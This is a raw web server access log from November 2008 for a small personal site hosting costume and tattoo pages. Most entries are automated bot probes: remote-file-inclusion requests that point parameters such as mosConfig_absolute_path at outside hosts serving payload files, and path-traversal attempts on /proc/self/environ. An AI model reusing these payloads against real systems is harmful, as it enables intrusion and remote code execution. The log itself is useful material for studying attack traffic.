210.219.173.249 - - [02/Nov/2008:20:09:25 -0600] "GET /logs/access_log.1214179200%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 385 "-""Mozilla/5.0"
210.219.173.249 - - [02/Nov/2008:20:09:25 -0600] "GET /logs/access_log.1212883200%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 385 "-""Mozilla/5.0"
213.165.84.215 - - [02/Nov/2008:20:10:32 -0600] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.neocron-stars.de/iftmpscks.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
213.165.84.215 - - [02/Nov/2008:20:10:32 -0600] "GET //init_basic.php?GALLERY_BASEDIR=http://www.neocron-stars.de/iftmpscks.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
200.93.147.155 - - [02/Nov/2008:20:13:41 -0600] "GET /logs///e404.php?DOCUMENT_ROOT=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
200.93.147.155 - - [02/Nov/2008:20:13:41 -0600] "GET ///e404.php?DOCUMENT_ROOT=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
72.30.79.125 - - [02/Nov/2008:20:16:35 -0600] "GET /costume/costume2.htm HTTP/1.0" 200 1810 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
119.95.139.99 - - [02/Nov/2008:20:18:11 -0600] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://search.yahoo.com/search;_ylt=A0oGkwpLXw5Jl0UA1CJXNyoA?p=all+nations+costumes+&y=Search&fr=yfp-t-501&ei=UTF-8&fp_ip=PH&rd=r1&meta=vc%3Dph""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
119.95.139.99 - - [02/Nov/2008:20:18:12 -0600] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
119.95.139.99 - - [02/Nov/2008:20:18:12 -0600] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
119.95.139.99 - - [02/Nov/2008:20:18:14 -0600] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
119.95.139.99 - - [02/Nov/2008:20:18:15 -0600] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
88.131.106.16 - - [02/Nov/2008:20:22:19 -0600] "GET /robots.txt HTTP/1.0" 404 282 "-""Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
88.131.106.16 - - [02/Nov/2008:20:22:19 -0600] "GET /costume/costume1.htm HTTP/1.0" 200 4913 "-""Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
24.67.0.44 - - [02/Nov/2008:20:23:04 -0600] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.neocron-stars.de/iftmpscks.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
24.67.0.44 - - [02/Nov/2008:20:23:05 -0600] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.neocron-stars.de/iftmpscks.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
216.117.144.149 - - [02/Nov/2008:20:31:00 -0600] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.mahbaran.com/load/copyright.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
216.117.144.149 - - [02/Nov/2008:20:31:00 -0600] "GET /logs/access_log.1218585600/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.mahbaran.com/load/copyright.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
209.184.138.106 - - [02/Nov/2008:20:33:56 -0600] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://tatthoo.com/tattoocat32.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
209.184.138.106 - - [02/Nov/2008:20:33:56 -0600] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
209.184.138.106 - - [02/Nov/2008:20:33:56 -0600] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
209.184.138.106 - - [02/Nov/2008:20:34:03 -0600] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
209.184.138.106 - - [02/Nov/2008:20:34:03 -0600] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
209.184.138.106 - - [02/Nov/2008:20:34:03 -0600] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
209.184.138.106 - - [02/Nov/2008:20:34:03 -0600] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
209.184.138.106 - - [02/Nov/2008:20:34:03 -0600] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
209.184.138.106 - - [02/Nov/2008:20:34:04 -0600] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
209.184.138.106 - - [02/Nov/2008:20:34:04 -0600] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
209.184.138.106 - - [02/Nov/2008:20:34:04 -0600] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
209.184.138.106 - - [02/Nov/2008:20:34:05 -0600] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
209.184.138.106 - - [02/Nov/2008:20:34:05 -0600] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
209.184.138.106 - - [02/Nov/2008:20:34:05 -0600] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
195.12.53.176 - - [02/Nov/2008:20:35:12 -0600] "GET /logs/access_log.1206144000//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 378 "-""libwww-perl/5.805"
195.12.53.176 - - [02/Nov/2008:20:35:12 -0600] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
195.12.53.176 - - [02/Nov/2008:20:35:12 -0600] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.805"
213.21.215.187 - - [02/Nov/2008:20:35:48 -0600] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.neocron-stars.de/iftmpscks.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
213.21.215.187 - - [02/Nov/2008:20:35:49 -0600] "GET //init_basic.php?GALLERY_BASEDIR=http://www.neocron-stars.de/iftmpscks.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
208.43.85.166 - - [02/Nov/2008:20:36:26 -0600] "GET /robots.txt HTTP/1.0" 404 282 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (compatible; itsapic.com_crawler/0.01 +http://itsapic.com/crawler.html; crawler@itsapic.com)"
208.43.85.166 - - [02/Nov/2008:20:36:32 -0600] "GET /costume/costume1.htm HTTP/1.0" 200 4913 "http://s.webring.com/hub?ring=history;id=1163;prvw""Mozilla/5.0 (compatible; itsapic.com_crawler/0.01 +http://itsapic.com/crawler.html; crawler@itsapic.com)"
208.43.85.166 - - [02/Nov/2008:20:36:36 -0600] "GET /costume/enter1.gif HTTP/1.0" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (compatible; itsapic.com_crawler/0.01 +http://itsapic.com/crawler.html; crawler@itsapic.com)"
208.43.85.166 - - [02/Nov/2008:20:36:43 -0600] "GET /costume/costm_a.JPG HTTP/1.0" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (compatible; itsapic.com_crawler/0.01 +http://itsapic.com/crawler.html; crawler@itsapic.com)"
200.93.147.155 - - [02/Nov/2008:20:36:49 -0600] "GET /logs/access_log.1206144000//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 378 "-""libwww-perl/5.805"
200.93.147.155 - - [02/Nov/2008:20:36:49 -0600] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
200.93.147.155 - - [02/Nov/2008:20:36:50 -0600] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.805"
208.43.85.166 - - [02/Nov/2008:20:36:51 -0600] "GET /costume/history5.gif HTTP/1.0" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (compatible; itsapic.com_crawler/0.01 +http://itsapic.com/crawler.html; crawler@itsapic.com)"
195.12.53.176 - - [02/Nov/2008:20:37:39 -0600] "GET /logs/access_log.1215302400//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 378 "-""libwww-perl/5.805"
195.12.53.176 - - [02/Nov/2008:20:38:34 -0600] "GET /logs/access_log.1206144000%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 379 "-""libwww-perl/5.805"
202.53.141.2 - - [02/Nov/2008:20:38:37 -0600] "GET /logs/access_log.1215302400//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 378 "-""libwww-perl/5.805"
200.93.147.155 - - [02/Nov/2008:20:39:58 -0600] "GET /logs/access_log.1215302400//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 378 "-""libwww-perl/5.805"
200.93.147.155 - - [02/Nov/2008:20:41:23 -0600] "GET /logs/access_log.1206144000%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 379 "-""libwww-perl/5.805"
213.247.43.5 - - [02/Nov/2008:20:42:45 -0600] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.neocron-stars.de/iftmpscks.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
213.247.43.5 - - [02/Nov/2008:20:42:45 -0600] "GET //init_basic.php?GALLERY_BASEDIR=http://www.neocron-stars.de/iftmpscks.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
211.234.110.184 - - [02/Nov/2008:20:44:06 -0600] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.neocron-stars.de/iftmpscks.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.803"
211.234.110.184 - - [02/Nov/2008:20:44:06 -0600] "GET //init_basic.php?GALLERY_BASEDIR=http://www.neocron-stars.de/iftmpscks.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
81.182.252.176 - - [02/Nov/2008:20:44:26 -0600] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://clusty.com/search??? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
81.182.252.176 - - [02/Nov/2008:20:44:26 -0600] "GET /logs/errors.php?error=http://clusty.com/search??? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
81.182.252.176 - - [02/Nov/2008:20:44:26 -0600] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 299 "-""XXXXXX"
81.182.252.176 - - [02/Nov/2008:20:44:27 -0600] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""XXXXXX"
81.182.252.176 - - [02/Nov/2008:20:44:27 -0600] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://clusty.com/search??? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
81.182.252.176 - - [02/Nov/2008:20:44:27 -0600] "GET /errors.php?error=http://clusty.com/search??? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
81.182.252.176 - - [02/Nov/2008:20:44:27 -0600] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 294 "-""XXXXXX"
81.182.252.176 - - [02/Nov/2008:20:44:27 -0600] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""XXXXXX"
210.219.173.249 - - [02/Nov/2008:20:44:59 -0600] "GET /logs/access_log.1212883200%20%20//config/dbutil.bck.php?confdir=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
210.219.173.249 - - [02/Nov/2008:20:44:59 -0600] "GET /logs//config/dbutil.bck.php?confdir=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
210.219.173.249 - - [02/Nov/2008:20:45:00 -0600] "GET /logs/access_log.1214438400%20%20//config/dbutil.bck.php?confdir=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
116.126.143.88 - - [02/Nov/2008:20:46:50 -0600] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.mahbaran.com/load/test.txt?? HTTP/1.1" 404 357 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
116.126.143.88 - - [02/Nov/2008:20:46:50 -0600] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.mahbaran.com/load/test.txt?? HTTP/1.1" 404 362 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
66.235.120.5 - - [02/Nov/2008:20:47:19 -0600] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
66.235.120.5 - - [02/Nov/2008:20:47:19 -0600] "GET /tattoo/ HTTP/1.1" 200 466 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
85.214.37.182 - - [02/Nov/2008:20:48:26 -0600] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.dutchpokercrew.nl//images/comprofiler/tn68_446226dfa4ffbjpg/bot.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
85.214.37.182 - - [02/Nov/2008:20:48:29 -0600] "GET //include/bbs.lib.inc.php?site_path=http://www.dutchpokercrew.nl//images/comprofiler/tn68_446226dfa4ffbjpg/bot.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
88.84.157.127 - - [02/Nov/2008:20:49:03 -0600] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 352 "-""XXXXXX"
88.84.157.127 - - [02/Nov/2008:20:49:03 -0600] "GET /logs/errors.php?error=http://clusty.com/search??? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
88.84.157.127 - - [02/Nov/2008:20:49:03 -0600] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://clusty.com/search??? HTTP/1.1" 404 352 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
88.84.157.127 - - [02/Nov/2008:20:49:03 -0600] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 352 "-""XXXXXX"
88.84.157.127 - - [02/Nov/2008:20:49:04 -0600] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://clusty.com/search??? HTTP/1.1" 404 347 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
88.84.157.127 - - [02/Nov/2008:20:49:04 -0600] "GET /errors.php?error=http://clusty.com/search??? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
88.84.157.127 - - [02/Nov/2008:20:49:04 -0600] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 347 "-""XXXXXX"
88.84.157.127 - - [02/Nov/2008:20:49:04 -0600] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 347 "-""XXXXXX"
210.219.173.249 - - [02/Nov/2008:20:51:01 -0600] "GET /logs/access_log.1212537600//config/dbutil.bck.php?confdir=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
66.40.52.30 - - [02/Nov/2008:20:59:12 -0600] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.800"
66.40.52.30 - - [02/Nov/2008:20:59:12 -0600] "GET /logs/access_log.1205366400//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.800"
66.40.52.30 - - [02/Nov/2008:20:59:19 -0600] "GET /logs//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.800"
66.147.239.184 - - [02/Nov/2008:20:59:47 -0600] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.diplom.nu/templates_c/id2.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.810"
66.147.239.184 - - [02/Nov/2008:20:59:47 -0600] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.diplom.nu/templates_c/id2.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.810"
66.40.52.30 - - [02/Nov/2008:21:00:11 -0600] "GET /logs/access_log.1208044800//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.800"
207.58.140.237 - - [02/Nov/2008:21:02:45 -0600] "GET /logs/access_log.1207785600/skin/zero_vote/ask_password.php?dir=http://www.mykr.net/bbs/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.811"
207.58.140.237 - - [02/Nov/2008:21:02:45 -0600] "GET /skin/zero_vote/ask_password.php?dir=http://www.mykr.net/bbs/id.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.811"
207.58.140.237 - - [02/Nov/2008:21:02:46 -0600] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.mykr.net/bbs/id.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
202.144.158.163 - - [02/Nov/2008:21:02:57 -0600] "GET /logs/access_log.1205366400%20//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
202.144.158.163 - - [02/Nov/2008:21:02:57 -0600] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
202.144.158.163 - - [02/Nov/2008:21:02:57 -0600] "GET /logs//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
66.40.52.30 - - [02/Nov/2008:21:03:35 -0600] "GET /logs/access_log.1205366400%20//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.800"
202.144.158.163 - - [02/Nov/2008:21:06:44 -0600] "GET /logs/access_log.1205366400//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
91.143.224.190 - - [02/Nov/2008:21:07:59 -0600] "GET /logs/access_log.1180310400 HTTP/1.0" 200 152890 "http://www.google.co.uk/search?hl=en&q=Ecom&btnG=Google+Search&meta=""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.1; Hotbar4.5.3.0; FunWebProducts; .NET CLR 1.1.4322; yplus 4.1.00b)"
62.87.154.41 - - [02/Nov/2008:21:13:14 -0600] "GET /logs/access_log.1205366400//faqsupport/samplefaqsupport.php?path[docroot]=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
62.87.154.41 - - [02/Nov/2008:21:13:14 -0600] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
62.87.154.41 - - [02/Nov/2008:21:13:14 -0600] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
77.221.151.34 - - [02/Nov/2008:21:18:30 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://www.davemaster.com/dotproject/files//idv6.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
94.23.0.147 - - [02/Nov/2008:21:21:18 -0600] "GET /logs/errors.php?error=http://clusty.com/search??? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.23.0.147 - - [02/Nov/2008:21:21:18 -0600] "GET /logs/index2.php?x=http://clusty.com/search??? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.23.0.147 - - [02/Nov/2008:21:21:18 -0600] "GET /logs/index2.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 299 "-""XXXXXX"
94.23.0.147 - - [02/Nov/2008:21:21:19 -0600] "GET /logs/index2.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""XXXXXX"
94.23.0.147 - - [02/Nov/2008:21:21:19 -0600] "GET /index2.php?x=http://clusty.com/search??? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.23.0.147 - - [02/Nov/2008:21:21:19 -0600] "GET /errors.php?error=http://clusty.com/search??? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.23.0.147 - - [02/Nov/2008:21:21:19 -0600] "GET /index2.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 294 "-""XXXXXX"
94.23.0.147 - - [02/Nov/2008:21:21:19 -0600] "GET /index2.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""XXXXXX"
62.87.154.41 - - [02/Nov/2008:21:29:53 -0600] "GET /logs/access_log.1208044800//faqsupport/samplefaqsupport.php?path[docroot]=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
89.218.85.18 - - [02/Nov/2008:21:31:10 -0600] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
89.218.85.18 - - [02/Nov/2008:21:31:10 -0600] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
200.140.135.93 - - [02/Nov/2008:21:31:25 -0600] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://200.113.126.76/ids.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
200.140.135.93 - - [02/Nov/2008:21:31:25 -0600] "GET /logs/access_log.1214179200//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://200.113.126.76/ids.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
200.140.135.93 - - [02/Nov/2008:21:31:25 -0600] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://200.113.126.76/ids.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
200.140.135.93 - - [02/Nov/2008:21:31:25 -0600] "GET /logs/access_log.1214524800//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://200.113.126.76/ids.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
89.218.85.18 - - [02/Nov/2008:21:31:34 -0600] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
89.218.85.18 - - [02/Nov/2008:21:31:35 -0600] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
210.219.173.249 - - [02/Nov/2008:21:31:35 -0600] "GET /logs/access_log.1214179200//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 383 "-""Mozilla/5.0"
210.219.173.249 - - [02/Nov/2008:21:33:15 -0600] "GET /logs/access_log.1217203200//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 383 "-""Mozilla/5.0"
